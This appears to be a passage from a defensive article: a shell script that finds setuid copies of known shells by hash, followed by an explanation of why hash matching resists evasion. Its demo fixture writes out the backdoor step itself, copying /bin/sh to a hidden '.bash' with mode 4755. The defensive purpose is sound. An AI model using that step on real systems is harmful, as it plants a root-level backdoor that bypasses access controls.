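# Prints every regular file under DIR that has the setuid bit set (-perm -4000)
# and whose sha256 matches one of the known shells. Unreadable files are skipped.
find_suid_shell_copies() {
    hashes=$(known_shell_hashes)
    find "$1" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        h=$(sha256sum "$f" 2>/dev/null | cut -d' ' -f1)
        if [ -n "$h" ] && printf '%s\n' "$hashes" | grep -qx "$h"; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# count_suid_shell_copies DIR -> number of hits, handy as an alerting threshold.
count_suid_shell_copies() {
    find_suid_shell_copies "$1" | wc -l | tr -d ' '
}

# make_sample_tree DIR builds a constructed sample for the demo: a hidden setuid
# copy of /bin/sh (the pattern the backdoor leaves), a plain non-setuid copy, and
# an unrelated setuid script that must not be reported.
make_sample_tree() {
    mkdir -p "$1"
    cp /bin/sh "$1/.bash" && chmod 4755 "$1/.bash"
    cp /bin/sh "$1/plain_copy" && chmod 0755 "$1/plain_copy"
    printf '#!/bin/sh\necho hi\n' > "$1/helper" && chmod 4755 "$1/helper"
}

# Stand-alone use:
#   sh suid_shell_audit.sh scan /usr      audit a real tree (run as root for full coverage)
#   sh suid_shell_audit.sh demo           run against the constructed sample tree
case "${1:-}" in
    scan) find_suid_shell_copies "${2:-/}" ;;
    demo) d=$(mktemp -d); make_sample_tree "$d"; find_suid_shell_copies "$d"; rm -rf "$d" ;;
esac
```

Matching on content rather than on file name is deliberate: the backdoor chooses the hidden name, so a name-based rule is trivial to evade, while a hash of the copied shell is not. Run the scan as root so that setuid-root files owned by other users are readable, and pair it with a baseline of the setuid files a clean install is expected to have.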

Link: http://feedproxy.google.com/~r/PentestTools/~3/tBsAiuIMyWY/backdoorme-powerful-auto-backdooring.html